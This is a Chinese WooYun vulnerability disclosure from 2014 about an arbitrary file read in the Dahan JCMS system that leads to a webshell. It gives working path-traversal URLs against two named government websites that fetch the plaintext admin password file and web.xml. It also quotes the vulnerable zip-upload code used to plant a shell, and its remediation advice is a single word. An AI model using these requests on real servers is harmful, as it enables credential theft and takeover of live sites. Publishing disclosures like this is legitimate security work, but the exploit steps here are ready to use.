当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-074283

漏洞标题:大汉版通系统任意文件读取getshell

相关厂商:南京大汉网络有限公司

漏洞作者: 路人甲

提交时间:2014-08-29 10:20

修复时间:2014-11-24 10:22

公开时间:2014-11-24 10:22

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-08-29: 细节已通知厂商并且等待厂商处理中
2014-08-29: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-10-23: 细节向核心白帽子及相关领域专家公开
2014-11-02: 细节向普通白帽子公开
2014-11-12: 细节向实习白帽子公开
2014-11-24: 细节向公众公开

简要描述:

大汉版通系统任意文件读取getshell

详细说明:

大汉版通jcms系统任意文件读取,可以直接获取管理员账号,密码明文、数据库密码明文、配置信息等非常敏感的信息,可以轻松实现无任何限制获取webshell...
漏洞出现在以下连接:
/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp
1)获取管理员密码明文
http://anxiang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/ini/merpserver.ini

11.png


2)获取数据库密码明文

22.png


3)获取配置文件敏感信息
http://www.wugang.gov.cn/jcms/jcms_files/jcms1/web1/site/module/comment/opr_readfile.jsp?filename=../../../../../../WEB-INF/web.xml

33.png


获取管理员密码后,可直接通过截断获取shell,缺陷代码如下

if(request.getMethod().toUpperCase().equals("POST")){   	
Jcms_UpdaterecordBLF blf = new Jcms_UpdaterecordBLF("1");
Jcms_Update_RecordEntity entity = new Jcms_Update_RecordEntity();
//解压路径
String strFilePath = strSysPath + "/update/";
//zip文件上传的临时目录
String strTemp = strFilePath + "temp/";
Convert.createDirectory(strTemp);
//建立上传
upload = new CommonUploadFile( strTemp ,"");
try{
//上传zip包
boolean bResult = upload.uploadFile(request);
String[] strFileName = upload.getAllFileName();
strBakPath = upload.getFormValue("vc_bakPath");
strBakPath = Convert.getValue(strBakPath);
strBakPath = (strBakPath.trim().length() == 0) ? strFilePath : strBakPath;
strBakPath = strBakPath.replaceAll("\\\\","/");
if(strBakPath.endsWith("/") || strBakPath.endsWith("\\"))
strBakPath = strBakPath.substring(0,strBakPath.length()-1);
strBakPath = strBakPath+"/bak/";
//创建备份目录
Convert.createDirectory(strBakPath);
ZipFile zip = new ZipFile();
//解压zip包
boolean bl = zip.unzip( true,strTemp + strFileName[0].trim(),strFilePath );
String strDate = DateFormat.getStrCurrentDate(DateFormat.LONG_DATE_TIME);
//zip包名
String strZipName = strFileName[0].substring(0,strFileName[0].lastIndexOf(".zip"));
if( bResult && bl){
entity.setVc_packagename(strZipName);
entity.setVc_spath(strFilePath);
entity.setVc_bpath(strBakPath);
entity.setC_createtime(strDate);
entity.setI_flag(1);
entity.setVc_status("未执行");
entity.setB_cancel(0);
bl = blf.doInsert(entity);
}
if( !bl ){
LogWriter.error( "ERROR: mark record!" );
}else{
//删除上传的zip文件
jcms.util.FileUtil.deleteFolder(strTemp);
}
}catch(Exception e){
LogWriter.error("ERROR: "+e.toString());
}
out.println(Convert.getAlterScript("alert('上传成功!');"));
out.println(Convert.getAlterScript("top.location.reload();"));
return;
}// End if
%>

漏洞证明:

得到管理员密码后,获取到shell截图如下

44.png

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-11-24 10:22

厂商回复:

问题重复,已经在新版本中修复

最新状态:

暂无


漏洞评价:

评论

  1. 2014-08-29 10:51 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    早日公开求围观

  2. 2014-08-29 11:33 | GsAn ( 路人 | Rank:8 漏洞数:7 | Whoami)

    这个叼